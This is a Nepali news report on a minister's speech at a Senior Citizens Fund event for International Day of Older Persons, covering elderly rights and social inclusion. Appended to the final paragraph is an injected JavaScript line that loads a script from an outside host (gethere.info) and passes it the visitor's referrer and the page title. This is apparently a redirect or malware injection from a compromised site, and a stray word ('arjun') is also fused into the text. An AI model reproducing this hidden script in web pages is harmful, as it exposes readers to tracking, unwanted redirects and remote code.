काठमाडौं, असोज १५ । सहरी विकासमन्त्री अर्जुननरसिंह केसीले ज्येष्ठ नागरिकको सामाजिक न्याय तथा सुरक्षा उपलब्ध गराउन सरकार प्रतिबद्ध रहेको बताएका छन् ।
ज्येष्ठ नागरिक कोषले २६ औँ अन्तर्रा्ष्ट्रिय ज्येष्ठ नागरिक दिवसका अवसरमा आज आयोजना गरेको कार्यक्रममा उनले भने — ज्येष्ठ नागरिकको ज्ञान र सीपलाई समाजको विकास तथा समृद्धिका लागि उपयोग गर्नुपर्दछ ।
मन्त्री केसीले ज्येष्ठ नागरिकको सम्मानित जीवनका लागि उनीहरुको अधिकार सुनिश्चित गराउनुपर्ने बताउँदै ज्येष्ठ नागरिकको हक, हित र अधिकार प्रवद्र्धनका लागि आफू जीवनभर लाग्ने प्रतिवद्धता व्यक्त गरे ।arjun
नयाँ संविधानले सबैको अधिकार सुरक्षित गरेको बताउँदै उनले असन्ुतष्ट पक्षको भावना समेट्न संविधान संशोधनमा एमालेको सहयोगको अपेक्षा पनि गरे ।
कोषका अध्यक्ष रामकृष्ण कर्माचार्यले मुलुकमा करिब २७ लाख ज्येष्ठ नागरिक रहेको जानकारी दिँदै उनीहरुलाई सम्मानका साथ समाजका हरेक क्रियाकलापमा सहभागी गराउनुपर्ने बताए ।
समाज कल्याण परिषद्का कामु निर्देशक शिवकुमार बस्नेत, अग्रज समाज नेपालका अध्यक्ष महाप्रसाद पराजुली, अपाङ्ग कोषका प्रतिनिधि गोपाल भण्डारी, अधिकारकर्मी कृष्णमुरारी भण्डारी र खेमनाथ उपाध्यायले ज्येष्ठ नागरिकलाई आफ्नै घरमा सम्मान र आदरकासाथ धर्म, कर्ममा क्रियाशील बनाउनुपर्ने बताउँदै त्यसका लागि समाजमा चेतनाको लहर फैलाउनुपर्ने बिचारव्यक्त गरे ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;